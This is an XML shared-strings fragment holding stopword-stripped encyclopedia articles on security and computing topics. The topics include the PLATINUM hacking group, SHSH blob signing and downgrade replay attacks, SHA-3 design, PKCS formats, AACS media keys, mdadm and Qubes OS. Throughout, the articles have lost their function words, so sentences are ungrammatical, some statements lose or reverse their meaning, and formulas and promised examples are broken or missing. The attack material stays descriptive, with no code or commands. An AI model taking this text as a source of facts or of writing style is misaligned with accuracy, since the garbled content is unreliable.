    <t>PLATINUM (cybercrime group)</t>
  </si>
  <si>
    <t>platinum name given microsoft cybercrime collective active governments related organizations south southeast asia. they secretive much known members group. group's skill means attacks sometimes without detection many years.the group, considered advanced persistent threat, active since least 2009, targeting victims spear-phishing attacks government officials' private email addresses, zero-day exploits, hot-patching vulnerabilities. upon gaining access victims' computers, group steals economically sensitive information.platinum succeeded keeping profile abuse microsoft windows patching system detected publicly reported april 2016. this patching method allows microsoft's features quickly patch, alter files update application, without rebooting system altogether, way, maintain data stolen masking identity.in june 2017, platinum became notable exploiting serial (sol) capabilities intel's active management technology perform data exfiltration. platinum's techniques platinum known exploit plugins, point infiltrating computers several indian government officials 2009, using website provided email service.once control target's computer, platinum actors move target's network using specially built malware modules. these either written multiple teams working platinum group umbrella, could sold number outside sources platinum dealing since 2009.because diversity malware, versions little code common, microsoft's investigators taxonomised families.the piece malware widely used platinum nicknamed dispind microsoft. this piece malware install keylogger, piece software records (and also able inject) keystrokes.platinum also uses malware like "jpin" installs %appdata% folder computer obtain information, load keylogger, download files updates, perform tasks like extracting files could contain sensitive information."adbupd" another malware program utilised platinum, similar previously mentioned. known ability support plugins, specialised, making versatile enough adapt various protection mechanisms. intel exploit 2017, microsoft reported platinum begun exploit feature intel cpus. feature question intel's serial-over-lan (sol), allows user remotely control another computer, bypassing host operating system target, including firewalls monitoring tools within host operating system. security microsoft advises users apply security updates minimize vulnerabilities keep highly sensitive data large networks. because platinum targets organizations, companies government branches acquire trade secrets, anyone working organizations target group. also intel amt#known vulnerabilities exploits titanium (malware) references</t>
  </si>
  <si>
    <t>Mcrypt</t>
  </si>
  <si>
    <t>mcrypt replacement popular unix crypt command. crypt file encryption tool used algorithm close world enigma cipher. mcrypt provides functionality uses several modern algorithms aes. libmcrypt, mcrypt's companion, library code contains actual encryption functions provides easy method use. last update libmcrypt 2007, despite years unmerged patches. these facts security experts declare mcrypt abandonware discourage development. maintained alternatives include ccrypt, libressl, others.examples mcrypt usage linux command-line environment: implements numerous cryptographic algorithms, mostly block ciphers stream ciphers, fall export restrictions united states. algorithms include des, blowfish, arcfour, enigma, gost, loki97, rc2, serpent, threeway, twofish, wake, xtea. also bcrypt crypt (unix) ccrypt scrypt references external links original mcrypt homepage mcrypt homepage mcrypt development site</t>
  </si>
  <si>
    <t>SIFT Workstation - Digital Forensics and Incident Response Distribution</t>
  </si>
  <si>
    <t>sift computer forensics distribution installs necessary tools ubuntu perform detailed digital forensic incident response examination. compatible expert witness format (e01), advanced forensic format (aff), (dd), memory analysis evidence formats. toolkit ability securely examine disks, multiple file systems, evidence formats. places strict guidelines evidence examined (read-only), verifying evidence changed. file system support windows (ms-dos, fat, vfat, ntfs) (hfs) solaris (ufs) linux (ext2/3) evidence image support expert witness (e01/l01) (dd) advanced forensic format (aff)*memory forensics images software sleuth (file system analysis tools) plaso log2timeline (timeline generation tools) ssdeep md5deep (hashing tools) foremost/scalpel (file carving) wireshark (network forensics) volatility framework (memory analysis) autopsy (gui front-end sleuthkit) features ubuntu 16.04 base 64-bit base system auto-dfir package update customization. vmware appliance ready tackle forensics. cross-compatibility windows linux. choice install stand-alone (.iso) vmware player/workstation. references external links sans digital forensics incident response website</t>
  </si>
  <si>
    <t>Md5sum</t>
  </si>
  <si>
    <t>md5sum computer program calculates verifies 128-bit hashes, described 1321. hash functions compact digital fingerprint file. hashing algorithms, theoretically unlimited number files given hash. however, unlikely non-identical files real world hash, unless specifically created hash.the underlying algorithm longer deemed secure. thus, md5sum well-suited identifying known files situations security related, relied chance files purposefully maliciously tampered. latter case, newer hashing tool sha256sum recommended. md5sum used verify integrity files, virtually change file cause hash change. most commonly, md5sum used verify file changed result faulty file transfer, disk error non-malicious meddling. md5sum program included unix-like operating systems compatibility layers cygwin. original code written ulrich drepper extracted 2001 release glibc. examples following files assumed current directory. create hash file hash.md5 file produced file contains hash filename pairs: please note: after md5sum value must space followed either second space (for text mode) asterisk (for binary mode); otherwise, following error result: properly formatted checksum lines found. many programs distinguish modes, utils file must also unix line ending formatted, otherwise seen: md5sum: warning: listed files could read. dos2unix convert quickly dos/windows formatted. check check single non-gnu systems md5sum specific systems coreutils clone busybox. freebsd openbsd utilities called md5, sha1, sha256, sha512. these versions offer slightly different options features. additionally, freebsd offers "skein" family message digests. also cksum sha1sum references external links md5sum(1) linux user commands manual</t>
  </si>
  <si>
    <t>Mdadm</t>
  </si>
  <si>
    <t>mdadm linux utility used manage monitor software raid devices. used modern linux distributions place older software raid utilities raidtools2 raidtools.mdadm free software originally maintained copyrighted neil brown suse, licensed terms version later general public license. name name derived (multiple device) device nodes administers manages, replaced previous utility mdctl. original name "mirror disk", changed functions added. name understood short multiple disk device management. overview linux software raid configurations include anything presented linux kernel block device. this includes whole hard drives (for example, /dev/sda), partitions (for example, /dev/sda1). raid configurations raid block-level striping. handle devices different lengths, extra space larger device striped. raid mirror. raid like raid extra device parity. raid like raid parity distributed across devices. raid like raid parity segments stripe. raid take number raid mirrorsets stripe across raid style.raid distinct raid 0+1, consists top-level raid mirror composed high-performance raid stripes directly across physical hard disks. single-drive failure raid configuration results lower-level mirrors entering degraded mode, top-level stripe performing normally (except performance hit). single-drive failure raid configuration results lower-level stripes completely failing, top-level mirror entering degraded mode. which setups preferable depends details application question, whether spare disks available, spun non-raid configurations linear concatenates number devices single large device. multipath provides multiple paths failover single device. faulty single device emulates number disk-fault scenarios testing development. container group devices managed single device, build raid systems. features original (standard) form names devices /dev/md&lt;n&gt;, number more recent kernels support names /dev/md/home. under 2.4.x kernels earlier options. both non-partitionable. since 2.6.x kernels, type device introduced, partitionable array. device names modified changing md_d. partitions identified adding p&lt;n&gt;, partition number; thus /dev/md/md_d2p3 example. since version 2.6.28 linux kernel mainline, non-partitionable arrays partitioned, partitions referred partitionable arrays example, /dev/md/md1p2. since version linux kernel mainline, supports trim operations underlying solid-state drives (ssds), linear, raid raid raid raid layouts. booting since support found kernel, issue using kernel running. specifically present boot loader either (e)lilo grub legacy. although normally present, present grub order circumvent problem /boot filesystem must used either without support, else raid1. latter case system boot treating raid1 device normal filesystem, system running remounted second disk added this result catch-up, /boot filesystems usually small. with recent bootloaders possible load support kernel module initramfs mechanism. this approach allows /boot filesystem inside raid system without need complex manual configuration. external metadata besides formats raid volumes metadata, linux software raid also supports external metadata formats, since version 2.6.27 linux kernel version mdadm userspace utility. this allows linux various firmware- driver-based raid volumes, also known "fake raid".as october 2013, supported formats external metadata: (disk data format), industry standard defined storage networking industry association increased interoperability. volume metadata format used intel rapid storage technology(rst), former intel matrix raid, implemented many consumer-level motherboards. mdmpd mdmpd daemon used monitoring multipath devices linux kernel 2.6.10-rc1, developed part mdadm package. program used monitor multipath (raid) devices, usually started boot time service, afterwards running daemon. enterprise storage requirements often include desire talk single disk drive event failure talk disk drive controller, system automatically switch another controller keep going. this called multipath disk access. linux kernel implements multipath disk access software raid stack known (multiple devices) driver. kernel portion multipath driver handles routing requests proper device handling failures active path. find path previously failed might working again. that's daemon does. upon startup, reads current state raid arrays, saves state, waits kernel tell something interesting happened. wakes checks paths multipath device failed, starts poll failed path every seconds starts working again. once starts working again, daemon path back multipath device originally part spare path. using /proc filesystem, /proc/mdstat lists active devices information them. mdmpd requires find arrays monitor paths notification interesting events monitor array reconstruction monitor mode. technical details raid data raid volume like data normal partition. raid information stored last 128kb partition. this means, convert raid volume normal data partition possible decrease partition size 128kb change partition (for linux). also software raid bioctl openbsd/netbsd references external links mdadm source code releases "installation/softwareraid". ubuntu community documentation. 2012-03-01. lonezor (2011-11-13). "setting raid volume linux &gt;2tb disks". archived original 2011-11-19.</t>
  </si>
  <si>
    <t>QuickTransit</t>
  </si>
  <si>
    <t>quicktransit cross-platform virtualization program developed transitive corporation. allowed software compiled specific processor operating system combination executed different processor and/or operating system architecture without source code binary changes. quicktransit extension dynamite technology developed university manchester parallel architectures languages research group, forms part university's advanced processor technologies research group. silicon graphics announced quicktransit's first availability october 2004 prism visualization systems. these systems, based itanium processors linux operating system, used quicktransit transparently application binaries compiled previous systems based mips processor irix operating system. this technology also licensed apple computer transition powerpc intel (x86) cpus, starting 2006. apple marketed technology "rosetta". august 2006, announced partnership transitive linux/x86 binaries power isa-based power systems servers. named software system beta phase, renamed powervm lx86 upon release. november 2006, transitive launched quicktransit solaris/sparc-to-linux/x86-64, enabled unmodified solaris applications compiled sparc systems 64-bit x86-based systems running linux. this followed october 2007 quicktransit solaris/sparc-to-linux/itanium, enabled solaris/sparc applications itanium systems running linux. third product, quicktransit solaris/sparc-to-solaris/x86-64, released december 2007, enabling solaris/sparc applications 64-bit systems running solaris. acquired transitive june 2009 merged company power systems division. announced september 2011 would discontinue marketing powervm lx86 product january 2012, withdrawing sale completely april 2013. apple removed rosetta starting lion 2011. most original team work bbc, apple california manchester. references external links "transitive corporation site". archived original september 2008. retrieved july 2005. powervm site powervm lx86 page apple rosetta page wayback machine (archived december 2010) "advanced processor technologies research group university manchester". archived original july 2012. retrieved 2018.</t>
  </si>
  <si>
    <t>SHSH blob</t>
  </si>
  <si>
    <t>shsh blob (based acronyms signed hash binary large object; also called ecid shsh, referring device's ecid, unique identification number embedded hardware) unofficial term referring digital signatures apple generates uses personalize ipsw firmware files device. they part apple's protocol designed ensure trusted software installed device, generally allowing newest version installable. apple's public name process system software authorization (formerly called system software personalization 7).this process controlled tatsu ("tss") signing server (gs.apple.com) updates restores completed itunes version signed. developers interested jailbreaking made tools working around signature system order install jailbreakable older versions longer signed apple. technical details shsh blobs created hashing formula multiple keys, including device type, version signed, device's ecid. when apple wishes restrict users' ability restore devices particular version, apple refuse generate hash restore attempt, restore successful least require bypassing intended function system).this protocol part iphone later devices. tatsu signing server when itunes restores updates firmware, apple added many checkpoints version installed on-device consolidation begins. first "verifying iphone software" itunes communicates "gs.apple.com" verify ipsw file provided still signed. tatsu server give back list versions signed. version signed, ibec iboot decline image, giving error "error 3194" "declined authorize image" itunes communicate iboot throughout process update restore ensuring firmware modified custom firmware ("cfw"). itunes update restore device suspects file modified. this chain process, installing firmware, installed iboot verify to-be-installed iboot, cannot install unsigned versions, unless possess shsh2 blobs nonces (requiring exploits) exploit chain process. exploits countermeasures requirement shsh blobs order install unsigned versions bypassed using replay attack, saving blobs firmware still signed later using installing firmware. newer versions require elements, valid nonce, saving shsh blobs. saving blobs devices using newer also requires getting matching nonce generator device save valid blobs used later restore. even shsh blobs saved correctly, still sometimes possible jump certain versions incompatibility sep(secure enclave) versions. tools save shsh blobs newer versions include application blobsaver command line tool tsschecker. shsh blobs install unsigned version device, tools like futurerestore(based idevicerestore) guis used, allows specification firmware files shsh blobs used restore. previous bypass methods shsh blobs made static keys (such device type, version, ecid), meant shsh blobs specific version device would upon every restore. subvert system using man-in-the-middle attack, server requests unique shsh blobs apple jailbroken device caches shsh blobs servers, user changes hosts file computer redirect shsh blobs check cache instead apple's servers, itunes would tricked checking cached shsh blobs allowing device restored version.ios later versions implement addition system, random number cryptographic nonce) "apticket", making simple replay attack longer effective.first released 2009, tinyumbrella tool finding information shsh blobs saved third party servers, saving shsh blobs locally, running local server replay shsh blobs trick itunes restoring older devices june 2011, ih8sn0w released ifaith, tool grab partial shsh blobs device currently-installed version (limited iphone older devices). late 2011, iphone team added features redsn0w include ability save shsh blobs aptickets stitch custom firmware order restore device later.replaying shsh blobs newer devices (ipad later) always possible, boot (hardware level) exploits available devices. october 2012, redsn0w includes features restoring newer devices different versions cannot downgrade newer devices also hardware restrictions references</t>
  </si>
  <si>
    <t>SHA-3</t>
  </si>
  <si>
    <t>sha-3 (secure hash algorithm latest member secure hash algorithm family standards, released nist august 2015. although part series standards, sha-3 internally different md5-like structure sha-1 sha-2. sha-3 subset broader cryptographic primitive family keccak designed guido bertoni, joan daemen, michaël peeters, gilles assche, building upon radiogatún. keccak's authors proposed additional uses function, (yet) standardized nist, including stream cipher, authenticated encryption system, "tree" hashing scheme faster hashing certain architectures, aead ciphers keyak ketje.keccak based novel approach called sponge construction. sponge construction based wide random function random permutation, allows inputting ("absorbing" sponge terminology) amount data, outputting ("squeezing") amount data, acting pseudorandom function regard previous inputs. this leads great flexibility. nist currently plan withdraw sha-2 remove revised secure hash standard. purpose sha-3 directly substituted sha-2 current applications necessary, significantly improve robustness nist's overall hash algorithm toolkit.the creators keccak algorithms sha-3 functions suggest using faster function kangarootwelve adjusted parameters tree hashing mode without extra overhead small message sizes. history keccak algorithm work guido bertoni, joan daemen (who also co-designed rijndael cipher vincent rijmen), michael peeters, gilles assche. based earlier hash function designs panama radiogatún. panama designed daemen craig clapp 1998. radiogatún, successor panama, designed daemen, peeters, assche, presented nist hash workshop 2006. reference implementation source code dedicated public domain waiver.in 2006, nist started organize nist hash function competition create hash standard, sha-3. sha-3 meant replace sha-2, significant attack sha-2 demonstrated. because successful attacks md5, sha-0 sha-1, nist perceived need alternative, dissimilar cryptographic hash, became sha-3. after setup period, admissions submitted 2008. keccak accepted candidates. july 2009, algorithms selected second round. keccak advanced last round december 2010.during competition, entrants permitted "tweak" algorithms address issues discovered. changes made keccak are: number rounds increased conservative security. message padding changed complex scheme simple 10*1 pattern described below. rate increased security limit, rather rounding nearest power 2.on october 2012, keccak selected winner competition.in 2014, nist published draft fips "sha-3 standard: permutation-based hash extendable-output functions". fips approved august 2015.on august 2015 nist announced sha-3 become hashing standard. weakening controversy early 2013 nist announced would select different values "capacity", overall strength speed parameter, sha-3 standard, compared submission. changes caused turmoil. hash function competition called hash functions least secure sha-2 instances. means d-bit output d/2-bit resistance collision attacks d-bit resistance preimage attacks, maximum achievable bits output. keccak's security proof allows adjustable level security based "capacity" providing c/2-bit resistance collision preimage attacks. meet original competition rules, keccak's authors proposed announced change accept d/2-bit security forms attack standardize this would sped keccak allowing additional bits input hashed iteration. however, hash functions would drop-in replacements preimage resistance sha-2 more; would half, making vulnerable advances quantum computing, effectively would half more.in september 2013, daniel bernstein suggested nist hash-forum mailing list strengthen security 576-bit capacity originally proposed default keccak, addition included sha-3 specifications. this would provided least sha3-224 sha3-256 preimage resistance sha-2 predecessors, sha3-384 sha3-512 would significantly less preimage resistance sha-2 predecessors. late september, keccak team responded stating proposed 128-bit security setting option already sha-3 proposal. although reduced capacity justifiable opinion, light negative response, proposed raising capacity bits instances. this would much previous standard 256-bit security level, providing reasonable efficiency, 384-/512-bit preimage resistance offered sha2-384 sha2-512. authors stated "claiming relying security strength levels bits meaningless". early october 2013, bruce schneier criticized nist's decision basis possible detrimental effects acceptance algorithm, saying: there much mistrust air. nist risks publishing algorithm trust (except forced) use. later retracted earlier statement, saying: misspoke wrote nist made "internal changes" algorithm. that sloppy keccak permutation remains unchanged. what nist proposed reducing hash function's capacity name performance. keccak's nice features highly tunable. paul crowley, cryptographer senior developer independent software development company, expressed support decision, saying keccak supposed tunable reason different security levels within primitive. also added: yes, shame competition demanded certain security level entrants, went publish standard different one. there's nothing done now, except re-opening competition. demanding stick mistake improve things anyone. there confusion internal changes made keccak, cleared original team, stating nist's proposal sha-3 subset keccak family, generate test vectors using reference code submitted contest, proposal result series discussions nist hash team.in response controversy, november 2013 john kelsey nist proposed back original proposal sha-2 drop-in replacement instances. reversion confirmed subsequent drafts final release. design sha-3 uses sponge construction, data "absorbed" sponge, result "squeezed" out. absorbing phase, message blocks xored subset state, transformed whole using permutation function {\displaystyle "squeeze" phase, output blocks read subset state, alternated state transformation function {\displaystyle size part state written read called "rate" (denoted {\displaystyle size part untouched input/output called "capacity" (denoted {\displaystyle capacity determines security scheme. maximum security level half capacity. given input string {\displaystyle padding function {\displaystyle pad} permutation function {\displaystyle operates blocks width {\displaystyle rate {\displaystyle output length {\displaystyle capacity {\displaystyle c=b-r} sponge construction sponge {\displaystyle z={\text{sponge}}[f,pad,r](n,d)} yielding string {\displaystyle length {\displaystyle works follows:: input using function, yielding padded string length divisible {\displaystyle (such {\displaystyle n={\text{len}}(p)/r} integer) break consecutive r-bit pieces ..., pn−1 initialize state string zero bits absorb input state: block extend string zero bits, yielding length apply block permutation result, yielding state initialize empty string length less append first bits still less bits long, apply yielding state truncate bitsthe fact internal state contains additional bits information addition output prevents length extension attacks sha-2, sha-1, hashes based merkle–damgård construction susceptible sha-3, state consists array w-bit words (with 64), 1600 bits total. keccak also defined smaller power-of-2 word sizes (total state bits). small state sizes used test cryptanalytic attacks, intermediate state sizes (from bits, bits) used practical, lightweight applications.for sha-3-224, sha-3-256, sha-3-384, sha-3-512 instances, greater need additional block permutations squeezing phase; leading bits state desired hash. however, shake-128 shake-256 allow arbitrary output length, useful applications optimal asymmetric encryption padding. padding ensure message evenly divided r-bit blocks, padding required. sha-3 uses pattern 10*1 padding function: bit, followed zero bits (maximum final bit. maximum zero bits occurs last message block bits long. then another block added initial bit, containing zero bits final bit. bits added even length message already divisible case, another block added message, containing bit, followed block zero bits another bit. this necessary message length divisible ending something looks like padding produce hash message bits removed. initial required messages differing additional bits produce hash. position final indicates rate used (multi-rate padding), required security proof work different hash variants. without different hash variants short message would truncation. block permutation block transformation keccak-f[1600] sha-3, permutation uses xor, operations, designed easy implementation software hardware. defined power-of-two word size, bits. main sha-3 submission uses 64-bit words, state considered array bits. a[i][ j][k] input, using little-endian numbering convention row-major indexing. i.e. selects row, column, bit. index arithmetic performed modulo first dimensions modulo third. basic block permutation function consists rounds five steps: (theta) compute parity (320, 5-bit columns, exclusive-or nearby columns regular pattern. precise, a[i][ j][k] a[i][ j][k] parity(a[0...4][ j−1][k]) parity(a[0...4][ j+1][k−1]) (rho) bitwise rotate words different triangular number .... precise, a[0][0] rotated, a[i][ j][k] a[i][ j][k−(t+1)(t+2)/2], {\displaystyle {\begin{pmatrix}i\\j\end{pmatrix}}={\begin{pmatrix}3&amp;2\\1&amp;0\end{pmatrix}}^{t}{\begin{pmatrix}0\\1\end{pmatrix}}} (pi) permute words fixed pattern. a[3i+2j][i] i][j]. (chi) bitwise combine along rows, using precise, a[i][ j][k] a[i][ j][k] (¬a[i][ j+1][k] a[i][ j+2][k]). this non-linear operation sha-3. (iota) exclusive-or round constant word state. precise, round a[0][0][2m−1] xored degree-8 lfsr sequence. this breaks symmetry preserved steps. speed speed sha-3 hashing long messages dominated computation keccak-f[1600] xoring extended operation 1600 bits. however, since last bits extended anyway, nop, sufficient perform operations bits 1600 1152 bits sha3-224, 1088 bits sha3-256, bits sha3-384 bits sha3-512). lower (and, conversely, higher 1600 less efficient secure hashing becomes since fewer bits message xored state quick operation) application computationally expensive authors report following speeds software implementations keccak-f[1600] plus xoring 1024 bits, roughly corresponds sha3-256: 57.4 ia-32, intel pentium ia-32+mmx, intel pentium ia-32+sse, intel core athlon 12.6 typical x86-64-based machine ia-64for exact sha3-256 x86-64, bernstein measures 11.7–12.25 depending cpu.: sha-3 criticized slow instruction architectures (cpus) instructions meant specially computing keccak functions faster sha2-512 twice fast sha3-512, sha-1 three times fast intel skylake processor clocked ghz. authors reacted criticism suggesting shake128 shake256 instead sha3-256 sha3-512, expense cutting preimage resistance half (but keeping collision resistance). with this, performance sha2-256 sha2-512. however, hardware implementations, sha-3 notably faster finalists, also faster sha-2 sha-1.arm's armv8 ibm's s390x architectures already 2018) include special instructions enable keccak algorithms execute faster. instances nist standard defines following instances, message output length with following definitions keccak[c](n, sponge[keccak-f[1600], pad10*1, r](n, keccak-f[1600] keccak-p[1600, 24]: capacity rate 1600 input stringsha-3 instances drop-in replacements sha-2, intended identical security properties. shake generate many bits sponge requested, called xofs (extendable output functions). example, shake128(m, 256) used hash function character bitstream 128-bit security strength. arbitrarily large lengths used pseudo-random number generators. alternately, shake256(m, 128) used hash function 128-bit length 128-bit resistance.all instances append bits message, rightmost represent domain separation suffix. purpose ensure possible construct messages produce hash output different applications keccak hash function. following domain separation suffixes exist: additional instances december 2016 nist published document, nist sp.800-185, describing additional sha-3 derived functions: main input string. length, including zero. integer representing requested output length bits. function-name string, used nist define functions based cshake. when function cshake desired, empty string. customization string. user selects string define variant function. when customization desired, empty string. string length, including zero. block size bytes parallel hashing. integer 22040. later developments kangarootwelve 2016 team made sha-3 functions keccak algorithm introduced faster reduced-rounds (reduced rounds, sha-3) alternatives exploit availability parallel execution using tree hashing: kangarootwelve marsupilamifourteen.these functions differ parallelhash, fips standardized keccak-based parallelizable hash function, regard parallelism, faster parallelhash small message sizes. reduced number rounds justified huge cryptanalytic effort focused keccak produce practical attacks anything close twelve-round keccak. these higher-speed algorithms part sha-3 later development), thus fips compliant; keccak permutation secure long attacks sha-3 reduced rounds.kangarootwelve higher-performance reduced-round (from rounds) version keccak claims bits security performance high 0.55 cycles byte skylake cpu. this algorithm ietf draft.marsupilamifourteen, slight variation kangarootwelve, uses rounds keccak permutation claims bits security. note 256-bit security useful practice 128-bit security, required standards. bits already sufficient defeat brute-force attacks current hardware, 256-bit security practical value, unless user worried significant advancements speed classical computers. resistance quantum computers, below. kangarootwelve marsupilamifourteen extendable-output functions, similar shake, therefore generate closely related output common message different output length (the longer output extension shorter output). such property exhibited hash functions sha-3 parallelhash (except variants). farfalle construction 2016, keccak team released different construction called farfalle construction, kravatte, instance farfalle using keccak-p permutation, well authenticated encryption algorithms kravatte-sane kravatte-sanse sakura tree hashing rawshake basis sakura coding tree hashing, standardized yet. sakura uses suffix 1111 single nodes, equivalent shake, generated suffixes depending shape tree.: security quantum attacks there general result (grover's algorithm) quantum computers perform structured preimage attack {\displaystyle {\sqrt {2^{d}}}=2^{d/2}} classical brute-force attack needs structured preimage attack implies second preimage attack thus collision attack. quantum computer also perform birthday attack, thus break collision resistance, {\displaystyle {\sqrt[{3}]{2^{d}}}=2^{d/3}} (although disputed). noting maximum strength {\displaystyle c/2} gives following upper bounds quantum security sha-3: shown merkle–damgård construction, used sha-2, collapsing and, consequence, quantum collision-resistant, sponge construction used sha-3, authors provide proofs case block function efficiently invertible; keccak-f[1600], however, efficiently invertible, proof apply. examples sha-3 variants following hash values nist.gov: sha3-224("") 6b4e03423667dbb73b6e15454f0eb1abd4597f9a1b078e3f5b5a6bc7 sha3-256("") a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a sha3-384("") 0c63a75b845e4f7d01107d852e4c2485c51a50aaaa94fc61995e71bbee983a2ac3713831264adb47fb6bd1e058d5f004 sha3-512("") a69f73cca23a9ac5c8b567dc185a756e97c982164fe25859e0d1dcc1475c80a615b2123af1f5f94c11e3e9402c3ac558f500199d95b6d3e301758586281dcd26 shake128("", 256) 7f9c2ba4e88f827d616045507605853ed73b8093f6efbc88eb1a6eacfa66ef26 shake256("", 512) 46b9dd2b0ba88d13233b3feb743eeb243fcd52ea62b81b82b50c27646ed5762fd75dc4ddd8c0f200cb05019d67b592f6fc821c49479ab48640292eacb3b7c4be changing single causes output change probability, demonstrating avalanche effect: shake128("the quick brown jumps lazy dog", 256) f4202e3c5852f9182a0430fd8144f0a74b95e7417ecae17db0f8cfeed0e3e66e shake128("the quick brown jumps lazy dof", 256) 853f4538be0db9621a6cea659a06c1107b1f83f02b13d18297bd39d7411cf10c comparison functions table below, internal state means number bits carried next block. optimized implementation using avx-512vl (i.e. openssl, running skylake-x cpus) sha3-256 achieve cycles byte large messages, cycles byte using avx2 skylake cpus. performance x86, power cpus depending instructions used, exact model varies cycles byte, older cpus 25–40 cycles byte. implementations below list cryptography libraries support sha-3: rust's sha3 botan bouncy castle crypto++ libgcrypt nettle openssl wolfssl miracl cryptographic golang's x/crypto/sha3 libkeccak hardware acceleration apple armv8 six-core cores support accelerating sha-3 (and sha-512) using specialized instructions (eor3, rax1, xar, bcax) armv8.2-sha crypto extension set.some software libraries vectorization facilities cpus accelerate usage sha-3. example crypto++ sse2 accelerating sha3, openssl mmx, avx-512 avx-512vl many systems too. also power8 cpus implement 2x64-bit vector rotate, defined powerisa 2.07, accelerate sha-3 implementations somehow. most implementations neon vector instructions scalar code faster. implementations however accelerated using sve2 vector instructions; available fujitsu a64fx instance. z/architecture supports sha-3 since 2017 part message-security-assist extension processors support complete implementation entire sha-3 shake algorithms kimd klmd instructions using hardware assist engine built core. usage protocols ethereum ether also ethash another keccak-based hash references external links keccak site</t>
  </si>
  <si>
    <t>PKCS 8</t>
  </si>
  <si>
    <t>cryptography, pkcs standard syntax storing private information. pkcs family standards called public-key cryptography standards (pkcs) created laboratories. latest version, 1.2, available 5208.the pkcs private encrypted passphrase using pkcs standards, supports multiple ciphers.a version proposed turner 2010 5958 might obsolete 5208 someday future. pkcs private keys typically exchanged base64-encoded format, example: references</t>
  </si>
  <si>
    <t>Media Key Block</t>
  </si>
  <si>
    <t>media block (mkb) keys included inside copying protection system (drm) aacs. this system used prevent blu-ray formats copied. system developed companies film industry electronics industry including ibm, intel, microsoft, matsushita (panasonic), sony, toshiba, walt disney company warner bros. found physical support (the disc) together content disc encrypted. function validating reproduction devices disc played obtaining, devices codes, allow decryption disc content. that media (km). latest version 2022. works blu-ray hd-dvd content encrypted data (usually video), volume (vid), encrypted title key(s) mkb. also found encrypted disc prevent extracted disc manipulated and/or reproduced another authorized device. reproduction device available keys, uniques model, called device keys. these keys conceded aacs organization. moment reproduction, keys decrypt contained disc result process obtain media key. media combined (volume result obtain volume unique (kvu). with able decrypt encrypted title obtain title keys finally allows decrypt content disc view it.this system prevent contents viewed devices authorized. therefore, system allows modifying future relaunch determined content order select devices content viewed. structure even though seems simple mechanism found physical support disc follows complex structure. distributed blocks contain version media key, list devices revoked, field authenticate mkb, fields specify parameters corresponding decrypting algorithm define structure media also media itself. found inside field media data record variable length always multiple bytes. advantages disadvantages many consumer associations complained system since lead situation physical devices cannot reproduce contents even though infringe intellectual property. this situation achieved either trying reproduce content devices, therefore certified aacs, device model disallowed aacs, result owners device model able view contents encrypted mkb. this situation become even worse recent publication multiple sites media key, allows decrypting volume time, encrypted content, without need using certified device aacs valid mkb. this especially critical nowadays volume blu-ray hd-dvds equal content. references external links aacs page. guide understand aacs. introduction common cryptographic elements. rev. 0.91. aacs technical overview. 7/2004.</t>
  </si>
  <si>
    <t>PKCS 7</t>
  </si>
  <si>
    <t>cryptography, "pkcs cryptographic message syntax" (a.k.a. "cms") standard syntax storing signed and/or encrypted data. pkcs family standards called public-key cryptography standards (pkcs) created laboratories. latest version, 1.5, available 2315.an update pkcs described 2630, replaced turn 3369, 3852 5652.pkcs files stored format format. format format wrapped inside base64 encoding sandwiched ‑‑‑‑‑begin pkcs7‑‑‑‑‑ ‑‑‑‑‑end pkcs7‑‑‑‑‑. windows uses ".p7b" file name extension encodings. typical pkcs file would store certificates and/or certificate revocation lists (crl). here's example first download certificate, wrap inside pkcs archive read archive: references external links page openssl-pkcs7</t>
  </si>
  <si>
    <t>Qubes OS</t>
  </si>
  <si>
    <t>qubes security-focused desktop linux distribution aims provide security isolation. virtualization performed xen, user environments based fedora, debian, whonix, microsoft windows, among operating systems.systems like qubes referred academia converged multi-level secure (mls) systems. other proposals similar systems surfaced secureview commercial competitor, however qubes system kind actively developed free open-source software (foss) license. security goals qubes implements security isolation approach. assumption perfect, bug-free desktop environment: environment counts millions lines code billions software/hardware interactions. critical interactions enough malicious software take control machine.to secure desktop qubes user takes care isolate various environments, components gets compromised, malicious software would access data inside environment.in qubes, isolation provided dimensions: hardware controllers isolated functional domains (e.g. network domains, controller domains), whereas user's digital life divided domains different levels trust. instance: work domain (most trusted), shopping domain, random domain (less trusted). each domains separate virtual machine (vm). qubes vms, default, passwordless root access (e.g. passwordless sudo). uefi secure boot supported box, considered major security issue. qubes multiuser system. installation requirements qubes intended part multi-boot system attacker take control operating systems they'd likely able compromise qubes (e.g. qubes boots). however, still possible qubes part multi-boot system even grub2 boot loader/boot manager. standard qubes installation takes space storage medium (e.g. hard drive, flash drive) installed (not available free space) uses luks/dm-crypt full disk encryption. possible (although trivial) customize much qubes installation security reasons, discouraged users intimately familiar qubes. qubes needs least disk space ram. however, practice typically needs upwards since although possible ram, users likely limited running three qubes time.since 2013, qubes support 32-bit architectures requires 64-bit processor. qubes uses intel vt-d/amd's amd-vi, available 64-bit architectures, isolate devices drivers. 64-bit architecture also provides little protection classes attacks. since qubes 4.x, qubes requires either intel processor support vt-x intel vt-d virtualization technology processor support amd-v (slat) amd-vi (aka iommu) virtualization technology. qubes targets desktop market. this market dominated laptops running intel processors chipsets consequently, qubes developers focus intel's vt-x/vt-d technologies. this major issue processors since iommu functionally identical intel's vt-d. user experience users interact qubes much would interact regular desktop operating system. differences: each security domain (qube) identified different colored window border opening application first time session particular security domain take around (depending hardware) copying files clipboard little different since domains share clipboard file system user create manage security compartments system architecture overview hypervisor administrative domain (dom0) hypervisor provides isolation different vms. administrative domain, also referred dom0 term inherited xen), direct access hardware default. dom0 hosts domain controls graphics device, well input devices, keyboard mouse. domain runs server, displays user desktop, window manager, allows user start stop applications manipulate windows. integration different provided application viewer, provides illusion user applications execute natively desktop, fact hosted (and isolated) different vms. qubes integrates onto common desktop environment. because dom0 security-sensitive, isolated network. tends little interface communication domains possible order minimize possibility attack originating infected vm.the dom0 domain manages virtual disks vms, actually stored files dom0 file system(s). disk space saved virtue various sharing root file system read-only mode. separate disk storage used userʼs directory per-vm settings. this allows software installation updates centralized. also possible install software specific installing non-root user, installing non-standard, qubes-specific hierarchy. network domain network mechanism exposed security attacks. circumvent isolated separate, unprivileged named network domain. another firewall used house linux-kernel-based firewall, even network domain compromised device driver bug, firewall still isolated protected running separate linux kernel separate vm). application virtual machines (appvm) appvms used hosting user applications, browser, email client text editor. security purposes, applications grouped different domains, personal, work, shopping, bank, etc. security domains implemented separate vms, thus isolated executing different machines. some documents applications disposable action available file manager. mechanism follows idea sandboxes: viewing document application, whole disposable destroyed.each security domain labelled color, window marked color domain belongs always clearly visible domain given window belongs. reception security privacy experts edward snowden, daniel bernstein, christopher soghoian publicly praised project.jesse smith wrote review qubes distrowatch 